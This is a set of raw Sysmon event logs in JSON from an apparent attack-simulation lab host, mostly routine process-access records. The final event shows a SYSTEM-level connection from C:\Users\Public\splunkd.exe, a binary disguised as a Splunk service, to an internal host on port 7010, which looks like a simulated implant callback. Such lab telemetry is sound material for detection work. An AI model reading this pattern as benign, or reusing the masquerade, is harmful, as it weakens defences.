{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1930,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1931,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1932,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1933,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1934,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00103B7D0300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00103B7D0300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1935,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.502\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.502","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1936,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.502\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.502","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1937,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.517\r\nSourceProcessGUID: {41C8662E-1F76-5F25-0000-0010D9D70300}\r\nSourceProcessId: 4036\r\nSourceThreadId: 4008\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.517","SourceProcessGUID":"{41C8662E-1F76-5F25-0000-0010D9D70300}","SourceProcessId":"4036","SourceThreadId":"4008","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":1938,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-08-01 07:53:24.631\r\nProcessGuid: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nProcessId: 2956\r\nImage: C:\\Users\\Public\\splunkd.exe\r\nUser: NT AUTHORITY\\SYSTEM\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 49685\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 10.0.1.12\r\nDestinationHostname: \r\nDestinationPort: 7010\r\nDestinationPortName: ","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","RuleName":"Usermode","UtcTime":"2020-08-01 07:53:24.631","ProcessGuid":"{41C8662E-1F69-5F25-0000-0010B7860200}","Image":"C:\\Users\\Public\\splunkd.exe","User":"NT AUTHORITY\\SYSTEM","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"49685","DestinationIsIpv6":"false","DestinationIp":"10.0.1.12","DestinationPort":"7010","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
